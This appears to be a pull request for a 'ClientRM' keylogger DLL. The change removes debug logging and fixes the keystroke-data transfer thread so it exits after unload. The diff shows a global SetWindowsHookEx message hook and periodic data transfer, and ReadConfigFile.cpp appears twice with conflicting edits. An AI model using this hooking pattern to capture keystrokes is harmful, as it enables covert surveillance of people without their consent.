### PR TITLE
Fix issue #5 Keylogger data transfer proc running after DLL unload

### DIFF
--- a/ClientRM/KeyLogger/KeyLogger/DLLMain.cpp
+++ b/ClientRM/KeyLogger/KeyLogger/DLLMain.cpp
@@ -21,8 +21,6 @@ WCHAR	CurrentDirectory[MAX_PATH + 1] = {0};
 
 BOOL	bKLExitAllReadConfigThread = FALSE;
 
-WCHAR g_szCurApp[MAX_PATH];
-
 #pragma data_seg()
 #pragma comment ( linker, "/SECTION:SharedSegment,RWS" )
 
@@ -32,12 +30,6 @@ BOOLEAN WINAPI DllMain( HINSTANCE hDllHandle, DWORD  nReason, LPVOID Reserved )
 	{
 	case DLL_PROCESS_ATTACH :
         {
-            if (GetModuleFileNameW(NULL, g_szCurApp, ARRAYSIZE(g_szCurApp)) > 0)
-            {
-                WCHAR szMsg[MAX_PATH];
-                swprintf_s(szMsg, L"KeyLogger: Attached to %s", g_szCurApp);
-                OutputDebugString(szMsg);
-            }
             InitializeCriticalSection(&csAppInit);
             InitializeCriticalSection(&csLinkList);
             break;
@@ -51,18 +43,11 @@ BOOLEAN WINAPI DllMain( HINSTANCE hDllHandle, DWORD  nReason, LPVOID Reserved )
 
 	case DLL_PROCESS_DETACH : // called when window closes
 		{
-            WCHAR szMsg[MAX_PATH];
-            swprintf_s(szMsg, L"KeyLogger: Detaching from %s", g_szCurApp);
-            OutputDebugString(szMsg);
-
 			bKLExitReadConfigThread = TRUE;
 			StartTransfer();
 
 			DeleteCriticalSection( &csLinkList );
 			DeleteCriticalSection( &csAppInit );
-
-            swprintf_s(szMsg, L"KeyLogger: Detached from %s", g_szCurApp);
-            OutputDebugString(szMsg);
 			break;
 		}
 	}
@@ -74,10 +59,6 @@ BOOLEAN WINAPI DllMain( HINSTANCE hDllHandle, DWORD  nReason, LPVOID Reserved )
 
 BOOL InstallKLHook( WCHAR *CPMDirectory )
 {
-    WCHAR szMsg[MAX_PATH];
-    swprintf_s(szMsg, L"KeyLogger: InstallKLHook in %s", g_szCurApp);
-    OutputDebugString(szMsg);
-
 	hWndHook = SetWindowsHookEx( WH_GETMESSAGE, (HOOKPROC)KLGetMsgProc, (HINSTANCE)hInstance, 0 );
 	if( hWndHook == NULL )
 		return FALSE;
@@ -90,10 +71,6 @@ BOOL InstallKLHook( WCHAR *CPMDirectory )
 
 BOOL RemoveKLHook()
 {
-    WCHAR szMsg[MAX_PATH];
-    swprintf_s(szMsg, L"KeyLogger: RemoveKLHook in %s", g_szCurApp);
-    OutputDebugString(szMsg);
-
 	bKLExitAllReadConfigThread = TRUE;
 
 	if( hWndHook )

--- a/ClientRM/KeyLogger/KeyLogger/DataTransfer.cpp
+++ b/ClientRM/KeyLogger/KeyLogger/DataTransfer.cpp
@@ -6,7 +6,6 @@ extern	CRITICAL_SECTION	csLinkList;
 extern	HINSTANCE			hInstance;
 extern	KLTEMPDATA			*pStartNode;
 extern	BOOL				bKLExitReadConfigThread;
-extern WCHAR g_szCurApp[];
 
 #pragma data_seg( "SharedSegment" )
 extern BOOL	bKLExitAllReadConfigThread;
@@ -21,10 +20,6 @@ DWORD WINAPI TransferLinkListData(LPVOID lParam)
         return GetLastError();
     }
 
-    WCHAR szMsg[MAX_PATH];
-    swprintf_s(szMsg, L"TransferLinkListData running in %s, threadID %u", g_szCurApp, GetCurrentThreadId());
-    OutputDebugString(szMsg);
-
     while (bKLExitAllReadConfigThread != TRUE && bKLExitReadConfigThread != TRUE)
     {
         // send data to KLIF after every 20 seconds..
@@ -32,8 +27,7 @@ DWORD WINAPI TransferLinkListData(LPVOID lParam)
         if (bKLExitAllReadConfigThread != TRUE && bKLExitReadConfigThread != TRUE)
             StartTransfer();
     }
-    swprintf_s(szMsg, L"TransferLinkListData exiting from %s, threadID %u", g_szCurApp, GetCurrentThreadId());
-    OutputDebugString(szMsg);
+
     FreeLibraryAndExitThread(hMod, ERROR_SUCCESS);
     return ERROR_SUCCESS; // unreachable code
 }

--- a/ClientRM/KeyLogger/KeyLogger/ReadConfigFile.cpp
+++ b/ClientRM/KeyLogger/KeyLogger/ReadConfigFile.cpp
@@ -9,7 +9,6 @@ extern	BOOL			fInitDone;
 extern	BOOL			fMonitorApp;
 extern	WCHAR			wszConfigFilePath[MAX_PATH + 1];
 extern	BOOL			bKLExitReadConfigThread;
-extern WCHAR g_szCurApp[];
 
 #pragma data_seg( "SharedSegment" )
 extern	BOOL		bKLExitAllReadConfigThread;
@@ -25,14 +24,10 @@ DWORD WINAPI ReadNewKLConfiguration(LPVOID lpParam)
     }
 
     HMODULE hMod = NULL;
-    if (!GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCWSTR)TransferLinkListData, &hMod))
+    if (!GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCWSTR)ReadNewKLConfiguration, &hMod))
     {
         return GetLastError();
     }
-
-    WCHAR szMsg[MAX_PATH];
-    swprintf_s(szMsg, L"ReadNewKLConfiguration running in %s, threadID %u", g_szCurApp, GetCurrentThreadId());
-    OutputDebugString(szMsg);
 
     while (bKLExitAllReadConfigThread != TRUE &&  bKLExitReadConfigThread != TRUE) {
         DWORD dwWait = WaitForSingleObject(hConfigChangeEvent, 1000);
@@ -41,9 +36,6 @@ DWORD WINAPI ReadNewKLConfiguration(LPVOID lpParam)
             ResetEvent(hConfigChangeEvent);
         }
     }
-    swprintf_s(szMsg, L"ReadNewKLConfiguration exiting from %s, threadID %u, %d, %d", g_szCurApp, GetCurrentThreadId(),
-        bKLExitAllReadConfigThread, bKLExitReadConfigThread);
-    OutputDebugString(szMsg);
 
     (void)CloseHandle(hConfigChangeEvent);
     FreeLibraryAndExitThread(hMod, ERROR_SUCCESS);

--- a/ClientRM/KeyLogger/KeyLogger/ReadConfigFile.cpp
+++ b/ClientRM/KeyLogger/KeyLogger/ReadConfigFile.cpp
@@ -25,13 +25,13 @@ DWORD WINAPI ReadNewKLConfiguration(LPVOID lpParam)
     }
 
     HMODULE hMod = NULL;
-    if (!GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCWSTR)ReadNewKLConfiguration, &hMod))
+    if (!GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCWSTR)TransferLinkListData, &hMod))
     {
         return GetLastError();
     }
 
     WCHAR szMsg[MAX_PATH];
-    swprintf_s(szMsg, L"ReadNewKLConfiguration running in %s, threadID %u\n", g_szCurApp, GetCurrentThreadId());
+    swprintf_s(szMsg, L"ReadNewKLConfiguration running in %s, threadID %u", g_szCurApp, GetCurrentThreadId());
     OutputDebugString(szMsg);
 
     while (bKLExitAllReadConfigThread != TRUE &&  bKLExitReadConfigThread != TRUE) {
@@ -41,7 +41,7 @@ DWORD WINAPI ReadNewKLConfiguration(LPVOID lpParam)
             ResetEvent(hConfigChangeEvent);
         }
     }
-    swprintf_s(szMsg, L"ReadNewKLConfiguration exiting from %s, threadID %u, %d, %d\n", g_szCurApp, GetCurrentThreadId(),
+    swprintf_s(szMsg, L"ReadNewKLConfiguration exiting from %s, threadID %u, %d, %d", g_szCurApp, GetCurrentThreadId(),
         bKLExitAllReadConfigThread, bKLExitReadConfigThread);
     OutputDebugString(szMsg);
 


### PR DESCRIPTION
The thread proc was waiting for 20s while the ClientRM.exe was waiting for only 5s. Moreover, just ClientRM.exe waiting is not enough - keylogger.dll must wait for thread to exit in every hooked binary.
Instead of waiting, we use the GetModuleHandleEx/FreeLibraryAndExitThread model along with the pre-existing BOOL flags to control thread proc exits.
Apply same changes in ImageGrab as well.
These changes reduce ClientRM.exe shutdown time by about 10s (KL and SG interfaces were waiting 5s each).